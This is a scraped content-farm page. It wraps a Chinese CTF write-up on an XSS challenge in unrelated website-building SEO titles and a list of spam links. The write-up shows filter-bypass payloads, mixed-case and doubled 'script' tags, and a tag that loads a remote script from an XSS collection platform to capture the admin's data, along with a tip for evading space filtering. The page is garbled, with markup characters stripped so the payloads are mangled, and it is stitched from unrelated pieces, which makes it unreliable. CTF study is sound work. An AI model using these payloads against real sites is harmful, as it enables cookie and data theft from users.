当前位置: 首页 > news >正文

珠海企业网站建设报价做的好看的pc端网站

珠海企业网站建设报价,做的好看的pc端网站,网页游戏网站排行,优化网站用什么软件好题目描述 题目截图如下#xff1a; 进入场景看看#xff1a; 解题思路 之间写过一题类似的#xff0c;所以这题应该是有什么不同的那就按照之前的思路进行测试试试提示说#xff1a;需要xss平台接收flag#xff0c;这个和之前说的提示一样 相关工具 xss平台#xf…题目描述 题目截图如下 进入场景看看 解题思路 之间写过一题类似的所以这题应该是有什么不同的那就按照之前的思路进行测试试试提示说需要xss平台接收flag这个和之前说的提示一样 相关工具 xss平台https://xssaq.com对xss的一些绕过进行学习了解 解题步骤 输入测试一下script代码 scriptalert(1)/script发现script被过滤了script被替换为空。参考str_replace()函数将字符串中的指定字符替换为其他字符 2. 换个大小写的试试 ScRiptALeRt(“XSS”);/sCRipT还是被过滤了大小写绕过 使用双写试试 scscriptriptalert(z)/scscriptript解释将中间的script替换为空剩下的结合后又是script可以成功绕过。 所以确定了过滤方式之后找个xss平台https://xssaq.com测试一下 之后测试其中的代码始终没有反应 极限短码好像不行 scsCRiPtript/SrC//uj.ci/qoe这个好像可以正常 scsCRiPtript/sRC//uj.ci/v9o/scsCRiPtript然后在评论区发现管理员说xss平台需要http模式的… 然后我找了半天没有找到这个http的平台但是当我再次看这个平台的时候哦豁出来又也就是说https其实也可以只是比较慢而已 PS除了会大小绕过之外其实还会对空格进行绕过。所以需要注意我们的测试代码中没有空格或者使用·/·来绕过对空格的限制。 得到Flag flag{772af954ed340063c935a60d92093504}新知识点 XSS篇——XSS过滤绕过技巧 xss各种姿势的学习(包含绕过)和个人重要总结 对此需要重点学习一下 有用的话请点赞收藏评论帮助更多的同学哦
http://www.zqtcl.cn/news/24995/

相关文章:

  • 济宁网站建设方面wordpress源神
  • 怎样做公司的网站首页中国沈阳网app
  • 公司网站维护由那个部门做wordpress图片专辑
  • 易瑞通网站建设网站打开慢什么原因
  • AD这个软件做网站用得着吗wordpress主题 问卷填报
  • 天猫网站建设的优势有哪些类似wordpress的网站
  • 温州公司做网站福田瑞沃e3
  • 网站后台登陆网址是多少wordpress建影视网站
  • 网站建设大概价格做网站用的动漫资料
  • 自己做一元夺宝网站长春优化
  • 烟台网站建设学校网站被黑 百度跳转
  • 专业手机建站公司wordpress 安装过程
  • 百度网站域名wordpress 如果
  • 网站建设全网推广人人商城源码
  • 网站界面风格设计漫画主体wordpress
  • 做网站的流程南平抖音搜索排名seo软件
  • 个人备案网站可以做新闻站吗网站建设的项目说明书
  • 佛山怎么做网站wordpress免费续ssl证书
  • 做网站低价吉林长春火车站官网
  • 中国建设投资集团 网站首页加油站建设专业网站
  • 徐州建设网站公司万国商业网
  • 怎么做二级网站响应式网站建设的好处
  • 网站制作加谷歌推广企业注册域名
  • 陕西建设银行缴费网站聊城制作网站
  • 道里网站运营培训重庆智能网站建设设计
  • 网站突然不收录2017wordpress访问插件
  • 津南天津网站建设开发公司是什么
  • 小程序快速建站比较好的h5网站
  • 网站建设公司发展理念网站模型怎么做的
  • 做网站的流程图手机网站全屏代码